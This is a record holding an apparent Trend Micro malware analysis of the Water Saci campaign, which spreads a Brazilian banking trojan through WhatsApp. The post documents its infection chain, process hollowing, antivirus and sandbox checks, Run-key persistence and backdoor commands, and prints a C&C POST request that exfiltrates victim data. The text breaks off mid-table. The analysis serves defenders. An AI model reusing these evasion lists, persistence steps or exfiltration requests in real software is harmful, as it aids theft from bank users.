{ "id": "ea2cc7a5-79c1-4c8c-a590-1ad1429c50f8", "created_at": "2026-04-06T00:13:22.617782Z", "updated_at": "2026-04-10T03:37:08.709991Z", "deleted_at": null, "sha1_hash": "6bfa827f98bc9fb1d5d7e6436f53687eb41cde1e", "title": "Unraveling Water Saci's New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3731176, "plain_text": "Unraveling Water Saci's New Multi-Format, AI-Enhanced Attacks\r\nPropagated via WhatsApp\r\nPublished: 2025-12-02 · Archived: 2026-04-05 18:29:57 UTC\r\nKey takeaways\r\nThe Water Saci campaign in Brazil has been observed using a highly layered attack chain that involves\r\nvarious file formats (including HTA files, ZIP archives, and PDFs), designed to bypass simple pattern-based detection and increase the complexity of analysis.\r\nThe attackers switched tactics by transitioning from their PowerShell-based propagation routine to a\r\nPython variant, which suggests an accelerated development pipeline. This newly observed variant allows\r\nfor broader browser compatibility, object-oriented code structure, enhanced error handling, and faster\r\nautomation of malware delivery through WhatsApp Web.\r\nEvidence suggests that attackers may have used AI tools like LLMs to convert their malware propagation\r\nscripts from PowerShell to Python; this would explain their capabilities for batch messaging, improved\r\nerror handling, and enhanced console output.\r\nTrend Vision One™ detects and blocks the IoCs discussed in this blog. Trend Micro customers can also\r\naccess tailored hunting queries, threat insights, and intelligence reports to better understand and proactively\r\ndefend against this campaign.\r\nBrazil has seen a recent surge of threats delivered via WhatsApp. As observed in our previously published\r\nresearch on the SORVEPOTEL malwareopen on a new tab and the broader Water Saci campaignopen on a new\r\ntab, this popular platform has been used to launch sophisticated campaigns. Unsuspecting users receive\r\nconvincing messages from trusted contacts, often crafted to exploit social engineering tactics and encourage\r\ninteraction with malicious content. While the core objectives of these campaigns remain consistent, this wave\r\nshowcases advanced techniques in infection, persistence, and evasion, underscoring how legitimate platforms are\r\nincreasingly being exploited to reach Brazilian targets more effectively.\r\nTheir new multi-format attack chain and possible use of artificial intelligence (AI)open on a new tab to convert\r\npropagation scripts from PowerShell to Python exemplifies a layered approach that has enabled Water Saci to\r\nbypass conventional security controls, exploit user trust across multiple channels, and ramp up their infection\r\nrates. As adversaries’ techniques evolve, organizations must be prepared for the heightened risk posed by\r\ncampaigns that combine technical complexity with AI-enhanced agility.\r\nMulti-format malware delivery through WhatsApp messages\r\nThe initial stage of this campaign demonstrates a diverse set of entry points employed by threat actors to reach\r\nvictims through WhatsApp. Users reported receiving messages from trusted contacts containing various forms of\r\nmalicious attachments.\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 1 of 29\n\nSome users received compressed archive files, such as ZIP files containing harmful payloads (Figure 1). Others\r\nwere targeted with messages encouraging them to download what appeared to be benign PDF documents, often\r\naccompanied by plausible lures like requests to update Adobe Reader for proper viewing (Figures 2 and 3).\r\nFigure 1. A WhatsApp message luring user to open the ZIP file\r\nFigure 2. A WhatsApp message luring user to open the PDF file\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 2 of 29\n\nFigure 3. Blurred image luring the users to click/update Adobe\r\nA notable subset of victims was targeted with a direct delivery of a malicious .hta file. Unlike ZIP or PDF formats,\r\nthe .hta file executes its embedded script immediately upon opening, streamlining the infection process for the\r\nattacker. One detail observed in multiple cases was the download of files with names following the pattern A-\r\n{random characters}.hta directly from web.whatsapp[.]com as shown in the Trend Vision One™ telemetry logs in\r\nFigure 4.\r\nFigure 4. Malicious HTA file\r\nFigure 5. Attack chain\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 3 of 29\n\nInitial vector - HTA file\r\nThe infection chain begins when the user executes a malicious HTA file, which contains an embedded Visual\r\nBasic (VB) script that utilizes two layers of obfuscation to evade detection and hinder analysis. Once this script is\r\ndeobfuscated, it reveals commands to create a batch file at C:\\temp\\instalar.bat and if executed, it initiates\r\nconnecting to the attacker’s command-and-control (C\u0026C) server to download an MSI installer and an automation\r\n(Python) script along with its supporting components.  \r\nBanking trojan - First stage\r\nFollowing execution of the batch file, the infection chain continues with the download and installation of the MSI\r\npackage. This installer serves as the primary vehicle for delivering the banking trojan and initiating its malicious\r\nactivities on the compromised system (Figure 6).\r\nFigure 6. MSI Installation leading to the banking trojan payload\r\nUpon inspection, the MSI package is found to contain several key components, described in more detail in Table\r\n1:\r\nFile name Description\r\nDaXGkoD7.exe AutoIt interpreter\r\nOns7rxGC.log Compiled AutoIt script\r\nrun.vbs Initial launcher for AutoIt\r\nstarter.bat Batch file to launch AutoIt in a specified folder\r\nucJDpQ.tda Encrypted PE payload\r\nfKmkzW.dmp\r\nAlternative encrypted PE payload (If ucJDpQ.tda is missing, fKmkzW.dmp serves as the\r\npayload)\r\nTable 1. Files in the MSI package\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 4 of 29\n\nThe installer leverages a custom action to execute the included VB script (run.vbs), as shown in Figure 7. The\r\nscript launches the AutoIt interpreter (DaXGkoD7.exe) to run the compiled AutoIt script (Ons7rxGC.log), shown\r\nin Figure 8. This process ultimately leads to the unpacking and activation of the final banking trojan payload\r\nhidden within the package.\r\nFigure 7. The MSI installer initially executes the VB script using CustomAction\r\nFigure 8. The VB script initiates the AutoIt interpreter (DaXGkoD7.exe), which then runs the\r\ncompiled AutoIt payload (ONs7rxGC.log)\r\nThe AutoIt script checks if it’s being executed for the first time then notifies a remote server (Figure 9). If the\r\nmarker file executed.dat does not exist, the function sends a notification to a specified URL and creates the marker\r\nfile with a timestamp. This mechanism ensures that the notification is triggered only once during the first\r\nexecution.\r\nFigure 9. AutoIt script initializing first-execution logic with remote notification\r\nOn other AutoIt scripts we found from infection cases, the scripts start by checking the system language. As\r\nshown in Figure 10, it verifies if Windows is set to Portuguese (Brazil) by comparing its language code (0416). If\r\nnot, it shows an error message with the detected language and exits the program. A helper function translates\r\nlanguage codes into readable names like Portuguese (Portugal), English (US), or Spanish (Spain).\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 5 of 29\n\nFigure 10. Language verification routine ensuring Windows is set to Portuguese (Brazil)\r\nThe script then scans the user’s system for banking-related activity (Figure 11), compiles the findings into a list,\r\nand sends the data to a C\u0026C server. The first function, DETECTARBANCO, checks for the presence of specific\r\ndirectories associated with Brazilian banking applications (Table 2). If these folders exist, the script records the\r\ncorresponding bank names, effectively fingerprinting which financial institutions the user interacts with. In Brazil,\r\naccessing most major banks requires security modules developed by independent companies as an attempt to\r\nprotect end users from client-side fraud. Attackers know this and use it as a reliable method to guess the victim’s\r\nprimary bank.\r\nFigure 11. Checking for installed Brazilian banking applications\r\nFile path Associated banking applications\r\nC:\\Program Files\r\n(x86)\\scpbrad\r\nBradesco banking software\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 6 of 29\n\nC:\\Program Files\\Warsaw\r\nWarsaw security module deployed by Banco do Brasil (BB) and Caixa\r\nEconômica Federal (CEF)\r\nC:\\Program Files\\Topaz OFD\r\nTopaz OFD anti-fraud module deployed by Banco do Brasil (BB) and Caixa\r\nEconômica Federal (CEF)\r\nC:\\Sicoobnet Sicoob banking software\r\nAppData\\Local\\Aplicativo\r\nItau\r\nItaú banking application\r\nTable 2. File paths associated with Brazilian banking applications\r\nThe second function, VERIFICARHISTORICOCHROME(), focuses on analyzing the user’s Chrome browser\r\nhistory to identify visits to banking websites (Figure 12). It locates the Chrome history database within the user’s\r\nprofile directory, creates a temporary copy, and reads its contents. The function then searches for specific banking-related URLs (Table 3). If any of these URLs are found, the corresponding bank names are recorded. This\r\ntechnique allows the script to detect banking activity even if no banking software is installed on the system.\r\nFigure 12. Checking Chrome browser history for visited banking websites\r\nTargeted URLs Associated bank\r\nwww[.]santander[.]com[.]br Santander\r\nautoatendimento[.]bb[.]com[.]br Banco do Brasil\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 7 of 29\n\ninternetbanking[.]caixa[.]gov[.]br Caixa Econômica Federal\r\nwww[.]sicredi[.]com[.]br Sicredi\r\nbanco[.]bradesco Bradesco\r\nTable 3. Specific banking-related URLs the second function searches for\r\nAfter identifying installed banking applications and analyzing browser history, the script moves on to another\r\ncritical reconnaissance step: checking for antivirus and security software. It inspects running processes for\r\nexecutables linked to the following security software:\r\n360sd.exe\r\n360tray.exe\r\nashDisp.exe\r\naswidsagent.exe\r\navast.exe\r\nAvastSvc.exe\r\nAvastUI.exe\r\navgnt.exe\r\navgui.exe\r\navguix.exe\r\navp.exe\r\navpui.exe\r\nbdagent.exe\r\nccapp.exe\r\nccSvcHst.exe\r\ncfp.exe\r\ncmdagent.exe\r\negui.exe\r\neguiProxy.exe\r\nekrn.exe\r\nfshoster32.exe\r\nkavtray.exe\r\nklwtblfs.exe\r\nmbam.exe\r\nMBAMService.exe\r\nmbamtray.exe\r\nmcshield.exe\r\nMcshield.exe\r\nmcuicnt.exe\r\nMSASCui.exe\r\nMSASCuiL.exe\r\nMsMpEng.exe\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 8 of 29\n\nNisSrv.exe\r\nns.exe\r\nPSUAMain.exe\r\nPSANHost.exe\r\nSAVADMINSERVICE.EXE\r\nSAVService.exe\r\nseccenter.exe\r\nSecurityHealthSystray.exe\r\nSophosUI.exe\r\nvkise.exe\r\nvsserv.exe\r\nWRSA.exe\r\nzatray.exe\r\nZAPrivacyService.exe\r\nThe script also iterates through the Windows Uninstall registry keys, searching for the following keywords related\r\nto antivirus and security software:\r\n360\r\nanti-virus\r\nantivirus\r\navast\r\navg\r\nbitdefender\r\ncomodo\r\ndefender\r\neset\r\nf-secure\r\nkaspersky\r\nmalwarebytes\r\nmcafee\r\nnorton\r\npanda\r\nsecurity\r\nsophos\r\ntrend micro\r\nwebroot\r\nzonealarm\r\nIn addition to collecting details about installed banking applications, security software, and visiting banking\r\nwebsites, the script also gathers the following information, which is then sent to a remote C\u0026C server:\r\nComputer name\r\nOS version, architecture and build number\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 9 of 29\n\nUsername\r\nLocal IP address\r\nExternal IP address\r\nCurrent date and time\r\nWindows version\r\nCPU model\r\nTotal physical memory\r\nThe script monitors an array of keywords for Brazilian banks, payment platforms, and cryptocurrency\r\nexchanges/wallets. It enumerates all open windows and then searches for keyword matches.\r\nTargeted entities include:\r\nBrazilian banks:\r\nBanco do Brasil\r\nBMG\r\nBradesco\r\nBS2\r\nBTG Pactual\r\nCEF\r\nItaú\r\nSantander\r\nSicoob\r\nSicredi\r\nPayment platform: \r\nMercado Pago\r\nInternational exchanges:\r\nBinance\r\nBitfinex\r\nBitstamp\r\nBybit\r\nCoinbase\r\nCrypto.com\r\nGate.io\r\nHuobi\r\nKraken\r\nKuCoin\r\nOKX\r\nBrazilian exchanges:\r\nBitcoin Trade\r\nBitPreco\r\nBraziliex\r\nFlowBTC\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 10 of 29\n\nFoxbit\r\nMercado Bitcoin\r\nNovaDAX\r\nCryptocurrency wallets:\r\nAtomic Wallet\r\nBlockchain.com\r\nCoinomi\r\nElectrum\r\nExodus\r\nJaxx\r\nLedger Live\r\nMetaMask\r\nMyCrypto\r\nMyEtherWallet\r\nPhantom\r\nSolflare\r\nTokenPocket\r\nTrezor\r\nTrust Wallet\r\nThe payload decryption is triggered by detecting banking or cryptocurrency-related windows on the victim's\r\ncomputer (Figure 13). If any of these windows contain keywords related to targeted entities, it proceeds on\r\nlocating the .tda file (ucJDpQ.tda) dropped earlier as part of the MSI installer. If no .tda files were found, it looks\r\nfor the .dmp file (fKmkzW.dmp) instead. \r\nFigure 13. Locating, decrypting, and decompressing the payload\r\nOnce located, the encrypted payload (either the .tda or .dmp file) is read as binary data and passed through a two-stage decryption and decompression process before it is loaded into the memory:\r\n1. The payload is decrypted using a custom RC4-like stream cipher with hardcoded parameters (seed=1000,\r\nmultiplier=3333, increment=3434), which unlocks the compressed executable hidden inside.\r\n2. The decrypted data is then decompressed using Windows' native LZNT1 algorithm through the\r\nRtlDecompressFragment API, expanding it back into a full PE executable.\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 11 of 29\n\nIf a .tda file is present, the AutoIt script decrypts and loads it as an intermediate PE loader (Stage 2) into memory.\r\nHowever, if only a .dmp file is found (no .tda present), the AutoIt script bypasses the intermediate loader entirely\r\nand loads the banking trojan directly into the AutoIt process memory, skipping the process hollowing step and\r\nrunning as a simpler two-stage infection.\r\nBanking trojan - Second stage\r\nThis loader then searches for additional .dmp or .tda files containing the final banking trojan, decrypts and\r\ndecompresses the payload using the same routine (Figure 14).\r\nFigure 14. Locating the final .dmp or .tda payload file\r\nThe loader injects it into a hollowed svchost.exe process to blend with legitimate Windows system processes\r\n(Figure 15). It also includes an alternate fallback base address in case virtual memory allocation fails, ensuring the\r\ninjection process can still proceed (Figures 16 and 17).\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 12 of 29\n\nFigure 15. Create suspended process and allocate memory\r\nFigure 16. Alternate fallback base addresses\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 13 of 29\n\nFigure 17. Resuming a hollowed process after setting thread context and writing the malicious\r\npayload into memory\r\nBanking trojan - Persistence\r\nAfter the script runs the payload’s entry point, the AutoIt script waits exactly two seconds to give the payload time\r\nto complete the process-hollowing routine inside svchost.exe (Figure 18).\r\nFigure 18. Loading the decrypted payload into memory and capturing the PID\r\nThe script then lists all running svchost.exe process (Figure 19), retrieves their creation timestamp, and identifies\r\nthe most recent instance which is assumed to be the malicious process where the payload has performed process\r\nhollowing. \r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 14 of 29\n\nFigure 19. Monitoring the most recent svchost.exe process\r\nThe script stores the PID of the said svchost.exe process and enters a continuous monitoring loop to regularly\r\ncheck if this specific svchost.exe process is still running. If the process hollowed svchost.exe is terminated the\r\nmalware resets its state, clears the stored PID, and waits to re-inject the payload the next time the victim opens a\r\nbanking window, ensuring persistent access to the victim's banking sessions.\r\nBanking trojan\r\nSeveral behaviors in this sample are similar to those observed in the Casbaneiro (Metamorfo)open on a new tab\r\nbanking malware lineage. Like earlier Metamorfo campaigns that relied on a launcher executable invoking\r\nAutoIt3 to run a compiled .A3X script alongside a DLL containing the main payload, this sample exhibits the\r\nsame multi-stage AutoIt-based delivery pattern. This chain ultimately unpacks and activates the banking trojan\r\npayload – mirroring Metamorfo’s signature reliance on AutoIt as a loader framework. Combined with the familiar\r\nwindow title monitoring, registry-based persistence, IMAP-based fallback C\u0026C mechanism, and the presence of\r\ntokenlike C\u0026C markers such as \u003c||\u003e, the sample reflects both structural and behavioral continuity with\r\nCasbaneiro/Metamorfo.\r\nAnti-sandbox analysis\r\nOnce executed, the payload begins with an aggressive set of anti-virtualization checks designed to evade analysis\r\nenvironments. The malware queries the registry path\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\ specifically looking for the following VM-related services:\r\nVGAuthService\r\nvm3dservice\r\nVMTools\r\nvmvss\r\nIt also enumerates active services to check for the same strings. If any match is found, the malware immediately\r\ntriggers a custom exception (EEDFADE) via RaiseException, effectively terminating execution to avoid sandbox\r\nanalysis (Figure 20).\r\nFigure 20. Exception triggered that is used for anti-sandbox analysis\r\nSystem Profiling via WMI\r\nIf virtualization is not detected, the payload proceeds to gather host information through multiple WMI queries,\r\nincluding:\r\nAntiVirusProduct\r\nWin32_ComputerSystem\r\nWin32_OperatingSystem\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 15 of 29\n\nWin32_Processor\r\nThe stolen information is later sent to the C\u0026C server as part of the initial check-in.\r\nRegistry modification and persistence\r\nThe malware creates a unique application registry entry under HKEY_CURRENT_USER\\Software\\MyUniqueApp,\r\nsetting UniqueSerial to a UUID-generated string. To maintain persistence, it adds itself to the AutoRun registry\r\nkey at HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run, pointing the entry to its\r\nexecutable path. It also drops an additional marker under HKEY_CURRENT_USER\\Software\\MeuApp by setting\r\ninicio = true, indicating that the main routine should begin.\r\nC\u0026C check-in communication\r\nThe payload then connects to its C\u0026C server at hxxps://serverseistemasatu.com/data.php?recebe and sends a\r\nPOST request containing system and user information:\r\nPOST /data.php?recebe HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: DelphiApp\r\nHost: serverseistemasatu.com\r\nContent-Length: 267\r\nCache-Control: no-cache\r\nnomeRegistro={User name}\u0026nomeComputador={Computer\r\nname}\u0026nomeSistema={Operating\r\nSystem}\u0026processador={Processor}\u0026antivirus={Antivirus\r\nproduct}\u0026ultimaAtualizacao={Date}\r\nTargeted banking window detection\r\nThe malware includes a timer-based routine (TForm1_Timer4Timer) that continuously scans the titles of active\r\nwindows to identify whether the user is interacting with banking or cryptocurrency platforms. When a match is\r\nfound, the malware classifies the detected application based on predefined window title substrings commonly\r\nassociated with major financial institutions and exchanges (Table 4).\r\nCategory Window title/substring Detected as\r\nSantander Santander - Ofertas para Empresas Santander\r\n  Internet banking empresarial - Santander Santander\r\n  Santander - Santander\r\nBanco do Brasil Banco do Brasil - Banco do Brasil\r\n  Banco do Brasil e mais Banco do Brasil\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 16 of 29\n\nAutoatendimento Banco do Brasil Banco do Brasil\r\nBanrisul Banrisul Home Banking Banrisul\r\n  Portal Internet Banrisul Home Banking Banrisul\r\n  Banrisul Office Banking Banrisul\r\nTribanco Tribanco » Para sua Empresa Tribanco\r\n  Tribanco » Para Você Tribanco\r\nBradesco Banco Bradesco Bradesco\r\n  Bradesco Net Empresa Bradesco - Bradesco\r\n  Bradesco Net Empresa Bradesco Bradesco\r\n  Bradesco Prime - Bradesco\r\n  Bradesco Prime e Bradesco\r\n  Internet Banking Bradesco: Bradesco\r\n  Internet Banking Bradesco: Saldos, extratos, Pix e muito mais! Bradesco\r\n  Bradesco Exclusive Digital Mais facilidade e autonomia - Bradesco\r\n  Bradesco Exclusive Digital Mais facilidade e autonomia Bradesco\r\n  Bradesco Para Você Bradesco\r\n  Bradesco Prime Digital Bradesco Prime Bradesco\r\n \r\nBradesco Global Private Bank Assessoria de Investimentos\r\nEspecializada\r\nBradesco\r\n  NavegadorExclusivoBradesco.exe Bradesco\r\nSicredi Sicredi Sicredi\r\nSicoob SicoobNet Sicoob\r\n  Sicoob - Sicoob\r\n  sicoob.com.br - SicoobNet Sicoob\r\nBMG Bem-vindo ao seu BMG BMG\r\n  BMG - BMG\r\nBTG Pactual app.btgpactual.com BTG Pactual\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 17 of 29\n\nBTG Pactual - BTG Pactual\r\n  BTG Pactual Empresas BTG Pactual\r\nBS2 app.empresas.bs2.com BS2\r\n  BS2 - BS2\r\n  Empresas BS2 BS2\r\nItaú Banco Itaú - Itaú\r\n  Itaú Personnalité I Itaú\r\n  Itaú Uniclass: Itaú\r\n  Itaú BBA - Itaú\r\n  Itaú BBA Itaú\r\n  Itaú BBA e Itaú\r\n  Itaú Empresas Itaú\r\nCrypto/Exchange Entrar Binance Binance\r\n  Iniciar sessão Binance Binance\r\n  Entre no site da OKX OKX OKX\r\n  Crypto.com Log in Crypto.com\r\n  Faça o login e acesse a sua conta do Mercado Bitcoin MB\r\nMercado\r\nBitcoin\r\n  Coinbase CryptoBR\r\n  Foxbit CryptoBR\r\n  Faça o login e acesse a sua conta do NovaDax NovaDax NovaDax\r\n  Faça login e opere Bitget Bitget\r\n  Login Bybit Bybit\r\n  - default_wallet CryptoBR\r\n  Login - Acesse sua conta Coinext Coinext\r\nTable 4. predefined window title substrings commonly associated with major financial institutions and exchanges\r\nthe malware classifies\r\nIMAP-based secondary C\u0026C discovery\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 18 of 29\n\nThe payload uses the same IMAP-based technique previously documented in our recent analysis of the Water Saci\r\ncampaign, where the malware logs into a terra.com.br mailbox using hardcoded credentials and retrieves an email\r\ntitled “meu” to extract an updated C\u0026C address from a line beginning with IP: (Figure 21). The key difference is\r\nthat while the earlier instance appeared only in a recovered auxiliary script, this version incorporates the IMAP\r\nroutine directly into the injected payload itself, indicating that the operators are reusing the same infrastructure\r\nand method, but have now embedded it deeper into the malware’s runtime to make C\u0026C updates more seamless\r\nand reliable.\r\nFigure 21. Function used for the IMAP-based technique C\u0026C retrieval\r\nBrowser termination routine\r\nBefore executing credential-related actions, the payload forcibly terminates several browsers:\r\nchrome.exe\r\nfirefox.exe\r\nmsedge.exe\r\nNavegadorExclusivoBradesco.exe\r\nOpera.exe\r\nThis behavior is common in banking malware that intercepts sessions or forces victims to reopen banking sites\r\nunder attacker-controlled conditions.\r\nBackdoor capabilities\r\nThe injected payload also includes an extensive set of backdoor commands, granting the operator near complete\r\nremote control over the infected system. Table 5 summarizes most of the commands along with their descriptions,\r\nproviding insight into the full range of actions this banking trojan can execute on a victim’s machine.\r\nCategory Command Description\r\nConnection\r\nCommands\r\n\u003c|SocketMain|\u003e Main socket communication handler\r\n\u003c|OK |\u003e Send system information \u003c|Info|\u003e to C\u0026C server\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 19 of 29\n\n\u003c|PING|\u003e / \u003c|PONG|\u003e Network connectivity test\r\n\u003c|Close|\u003e Close all active connections\r\nAuthentication and\r\nSecurity\r\n\u003c|NOSenha|\u003e  Display password error message\r\nRemote Desktop and\r\nScreen Control\r\n\u003c|REQUESTKEYBOARD|\u003e Enable keyboard capture\r\n\u003c|first|\u003e Initialize screen sharing session\r\n\u003c|AtivarImagem|\u003e Start screen capturing\r\n\u003c|DesativarImagem|\u003e Stop screen capturing\r\n\u003c|AlterarResolucao|\u003e Modify screen resolution\r\nCommunication\r\nFeatures\r\n\u003c|OpenChat|\u003e\r\n\u003c|Chat|\u003e Chat Functionality\r\n\u003c|CloseChat|\u003e\r\nMouse Control\r\nCommands\r\n\u003c|MousePos|\u003e\r\nMouse movement and clicking simulation •     \r\nLD/LU: Left mouse button down/up •      RD/RU:\r\nRight mouse button down/up •      MD/MU:\r\nMiddle mouse button down/up\r\n\u003c|MouseLD|\u003e\r\n\u003c|MouseLD_Volta|\u003e\r\n\u003c|MouseLU|\u003e\r\n\u003c|MouseLU_Volta|\u003e\r\n\u003c|MouseRD|\u003e\r\n\u003c|MouseRD_Volta|\u003e\r\n\u003c|MouseRU|\u003e\r\n\u003c|MouseRU_Volta|\u003e\r\n\u003c|MouseMD|\u003e\r\n\u003c|MouseMD_Volta|\u003e\r\n\u003c|MouseMU|\u003e\r\n\u003c|MouseMU_Volta|\u003e\r\n\u003c|MouseWheelUp|\u003e Mouse wheel scrolling\r\n\u003c|MouseWheelUp_Volta|\u003e\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 20 of 29\n\n\u003c|MouseWheelDown|\u003e\r\n\u003c|MouseWheelDown_Volta|\u003e\r\n\u003c|MOUSESENDINPUT|\u003e\r\nToggle mouse input method\r\n\u003c|MOUSESENDNORMAL|\u003e\r\n  \u003c|LULUZSD|\u003e  \r\nFile System\r\nOperations\r\n\u003c|Folder|\u003e List directories\r\n\u003c|Files|\u003e List files in directory\r\n\u003c|DownloadFile|\u003e Download file from victim to C\u0026C\r\n\u003c|UploadFile|\u003e Upload file from C\u0026C to victim\r\nSystem Control\r\n\u003c|RESTART|\u003e Force restart the machine\r\n\u003c|CMD|\u003e Execute remote command using cmd.exe\r\n\u003c|MONKEY|\u003e Random input simulation\r\nWindows\r\nManagement\r\n\u003c|LIST_WINDOWS|\u003e Enumerate all windows\r\n\u003c|LISTMIN_WINDOWS|\u003e Minimize windows\r\n\u003c|LISTKILL_WINDOWS|\u003e Kill specific windows\r\nMonitoring and\r\nEvasion\r\n\u003c|MOVISIBLE|\u003e\r\nControl mouse cursor visibility\r\n\u003c|MOINVISIBLE|\u003e\r\n\u003c|BLOQUEARMOUSE|\u003e\r\nBlock/restore mouse functionality\r\n\u003c|RESTAURARMOUSE|\u003e\r\n\u003czzz|DELETEDKL|\u003e Delete keylogger data\r\n\u003c|MENSAGEM|\u003e Display custom message\r\nSystem Information\r\n\u003c|GETINFO|\u003e /\r\n\u003c|LIST_INFO|\u003e\r\nGather system information\r\n\u003c|Metodo|\u003e Set operational method/mode\r\n\u003c|Reconected|\u003e Handle reconnection\r\nPrint System Control \u003c|GETPRINTHANLE|\u003e Screen capture for different contexts\r\n\u003c|GETPRINTMAGNIFIER|\u003e\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 21 of 29\n\n\u003c|GETPRINTDESKTOP|\u003e\r\n\u003c|GETPRINTAPP|\u003e\r\nBanking/Financial\r\nMalware Features\r\n\u003c|CE_ASSI|\u003e\r\nCreates fake banking interfaces, Captures\r\ncredentials and transaction data, specifically\r\ntargets Brazilian banking systems\r\n\u003c|CE_TRANS|\u003e\r\n\u003c|CB_SEN|\u003e\r\n\u003c|CB_UPDATE|\u003e\r\n\u003c|PedidoSenhas|\u003e Request passwords\r\n\u003c|SendSenha|\u003e Send passwords\r\n\u003c|HOLE|\u003e\r\nScreen overlay management\r\n\u003c|HOLENOFF|\u003e\r\nTable 5. Backdoor commands granting the operator near-complete remote control over an infected system\r\nPropagation automation - whatsz.py\r\nOur analysis revealed that both tadeu.ps1 discussed in our previous blog entryopen on a new tab and whatsz.py\r\n(Figure 22) are functionally equivalent to the WhatsApp automation malware. The Python sample appears to be an\r\nenhanced port of the PowerShell version, maintaining the same workflow, logic, and intent. The extensive use of\r\nPython in this stage enables the attackers to automate propagation, streamline payload delivery, and enhance the\r\nflexibility and resilience of their malicious operations.\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 22 of 29\n\nFigure 22. Component files downloaded by instalar.bat and used by whatsz.py\r\nWhen instalar.bat was executed, it downloaded component files including Python 3.12.7, get-pip.py, and the\r\nchromedriver.exe needed by the Python script to function properly and carry out its propagation routine (Figure\r\n23). Both the PowerShell (tadeu.ps1) and Python (whatsz.py) scripts basically do the same things. They automate\r\nWhatsApp via Selenium, inject the WA‑JS library, grab contact lists, send files automatically (using Base64\r\nencoding), load remote configurations, pause and resume tasks, and report progress back to a C\u0026C server.\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 23 of 29\n\nFigure 23. Execution of instalar.bat leading to the Python script routine as seen in Vision One\r\nTable 6 compares the previous PowerShell-based propagation routine with the newly observed Python variant,\r\nhighlighting their shared automation features and enhancements in the latest campaign.\r\nFeature PowerShell (tadeu.ps1) Python (whatsz.py) Match?\r\nWhatsApp automation via Selenium ✓ ✓ YES\r\nWA-JS library injection ✓ ✓ YES\r\nMass contact extraction ✓ ✓ YES\r\nAutomated file sending ✓ ✓ YES\r\nBase64 file encoding ✓ ✓ YES\r\nRemote configuration loading ✓ ✓ YES\r\nPause/resume system ✓ ✓ YES\r\nProgress reporting to C\u0026C ✓ ✓ YES\r\nContact list exfiltration ✓ ✓ YES\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 24 of 29\n\nTable 6. Comparison of features between the PowerShell-based propagation routine and the Python variant\r\nGiven the similarity of logic, the injected JavaScript, and the explicit description included in the Python code\r\nitself, “WhatsApp Automation Script – Versao Python Convertido de PowerShell para Python Suporte para\r\nChrome, Edge e Firefox” (Figure 24), there is compelling circumstantial evidence that an automated aid, such as a\r\nlarge language model (LLM) or code-translation tool, may have been used to accelerate the porting process. LLMs\r\nhave proven capabilities for translating and refactoring code across languages and are commonly used for tasks\r\nlike legacy migration and cross-language translation. While this observation doesn’t definitively prove that an\r\nLLM was involved, it strongly supports the plausibility that one could have sped up the conversion.\r\nFigure 24. Python script header explicitly stating it was converted from PowerShell\r\nFigures 25 and 26 display additional sections of the script that suggest the use of an LLM to expedite the\r\nconversion process. The snippets provided further illustrate potential interactions with AI, where requests for\r\nenhancements are made. \r\nFigure 25. The text: ”send message to a contact – version optimized with errors handling”\r\nFigure 26. The text: ” Send message to multiple contacts at same time – super fast!”\r\nNotably, the script includes optimized messaging functions and a main automation class with comprehensive\r\nformatting for different statuses (Figure 27).\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 25 of 29\n\nFigure 27. Main automation class with formatting definitions for different statuses\r\nThe script produces highly interesting and colorful output, including the use of emojis in console outputs, while\r\nrunning in the background (Figure 28). This is atypical for manually written automation scripts and may indicate\r\nAI-generated code designed for enhanced user experience.\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 26 of 29\n\nFigure 28. Example of colorful and emoji-enhanced console output, suggesting possible AI-generated script features.\r\nDespite the logic similarity, improvements were made that materially increase the Python variant’s reach,\r\nreliability, and operational flexibility; this suggests that the port isn’t just a straight translation but an upgrade. The\r\nPython build shifts to a more portable runtime, separates concerns into clearer classes, adds richer error handling\r\nand batch-sending capabilities, and broadens browser support (Table 7). Together, these changes make\r\npropagation faster, more resilient to failure, and easier to maintain or extend. \r\nAspect PowerShell Python Significance\r\nLanguage PowerShell Python 3 Port/translation\r\nBrowser support Chrome only Chrome/Edge/Firefox\r\nEnhanced capability and wider\r\nreach\r\nhttps://www.trendmicro.com/en_us/research/25/l/water-saci.html\r\nPage 27 of 29\n\nCode\r\norganization\r\nFunctions Object-oriented (class) Better structure\r\nError handling\r\nBasic try-catchEnhanced with specific\r\nhandlers\r\nMore robust\r\nBatch 